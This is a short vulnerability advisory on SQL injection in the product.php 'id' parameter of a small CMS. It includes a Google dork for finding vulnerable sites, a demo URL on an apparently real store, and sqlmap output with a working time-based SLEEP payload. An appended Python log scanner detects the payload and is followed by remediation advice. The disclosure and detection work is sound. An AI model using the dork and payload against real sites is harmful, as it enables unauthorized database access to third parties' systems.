#Exploit Title: Chris Anderson CMS SQL Injection Vulnerability
#Date: 2020-10-04
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: c-h-r-i-s.co.uk
#Google Dork: " Design by Chris Anderson "
#Category: webapps
#Tested On: Windows 10, Firefox
SQL Injection
Demo: https://waxoasis.com/store/product.php?id=103[SQL Injection Vulnerability]&name=ancient-temple16-oz
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=103' AND (SELECT 8779 FROM (SELECT(SLEEP(5)))fuXD) AND 'gIvL'='gIvL&name=ancient-temple16-oz
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[INFO] the back-end DBMS is MySQL
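Added example (not part of the original advisory and not the vendor's code): a log check a defender could run to find requests like the one reported above, where the `id` parameter of product.php carries a time-delay function or any non-numeric value. The log lines are constructed samples in combined-log style, and the function names are illustrative assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Oct/2020:10:00:01 +0000] "GET /store/product.php?id=103&name=ancient-temple16-oz HTTP/1.1" 200 5120',
    '203.0.113.9 - - [04/Oct/2020:10:00:05 +0000] "GET /store/product.php?id=103%27%20AND%20(SELECT%208779%20FROM%20(SELECT(SLEEP(5)))fuXD)%20AND%20%27gIvL%27=%27gIvL&name=ancient-temple16-oz HTTP/1.1" 200 5120',
    '203.0.113.12 - - [04/Oct/2020:10:00:11 +0000] "GET /store/product.php?id=103abc HTTP/1.1" 200 5120',
    '198.51.100.4 - - [04/Oct/2020:10:00:12 +0000] "GET /store/index.php HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# MySQL functions commonly used to introduce a delay in time-based blind tests.
TIME_FUNC_RE = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.IGNORECASE)
NUMERIC_RE = re.compile(r'[0-9]+')


def classify(line):
    """Return None for a benign line, otherwise a short reason string."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith('/product.php'):
        return None
    # parse_qs percent-decodes values, so encoded payloads are seen in clear.
    for value in parse_qs(url.query, keep_blank_values=True).get('id', []):
        if TIME_FUNC_RE.search(value):
            return 'time-delay function in id'
        if not NUMERIC_RE.fullmatch(value):
            return 'non-numeric id'
    return None


def scan(lines):
    """Return (client_ip, reason) for every suspicious request."""
    return [(line.split()[0], reason)
            for line in lines if (reason := classify(line))]


if __name__ == '__main__':
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

The same numeric-only rule applied server-side (casting `id` to an integer or binding it in a prepared statement) removes the injection point rather than just detecting it.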
*********************************************************
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************